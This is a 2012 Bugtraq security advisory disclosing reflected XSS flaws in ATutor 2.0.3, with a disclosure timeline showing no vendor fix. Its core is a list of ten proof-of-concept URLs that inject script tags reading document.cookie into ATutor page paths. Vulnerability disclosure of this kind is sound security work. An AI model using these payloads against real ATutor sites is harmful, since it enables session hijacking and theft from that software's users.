ATutor 2.0.3 Multiple XSS vulnerabilities

From: sschurtz@darksecurity.de
To: bugtraq@securityfocus.com
Cc:
Subject: ATutor 2.0.3 Multiple XSS vulnerabilities
Date:


Advisory:               ATutor 2.0.3 Multiple XSS vulnerabilities
Advisory ID:              SSCHADV2012-002
Author:                     Stefan Schurtz
Affected Software:   Successfully tested on ATutor 2.0.3
Vendor URL:             http://atutor.ca
Vendor Status:             informed

==========================
Vulnerability Description
==========================

ATutor 2.0.3 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

http://[target]/ATutor/themes/default/tile_search/index.tmpl.php/" <script>alert(document.cookie)</script>
http://[target]/ATutor/login.php/index.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/search.php/index.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/password_reminder.php" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/jscripts/infusion/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/login.php/mods/_standard/flowplayer/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/browse.php/jscripts/infusion/framework/fss/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/registration.php/themes/default/ie_styles.css" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/about.php/" <script>alert(document.cookie)</script>/index.php
http://[target]/ATutor/themes/default/social/basic_profile.tmpl.php/" <script>alert(document.cookie)</script>/index.php

=========
Solution
=========

-

====================
Disclosure Timeline
====================

01-Jan-2012 - vendor informed
01-Jan-2012 - vendor feedback
15-Jan-2012 - no fix available

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://atutor.ca/view/3/22740/1.html
http://www.darksecurity.de/advisories/2012/SSCHADV2012-002.txt





Copyright © 1995-2020 LinuxRocket.net. All rights reserved.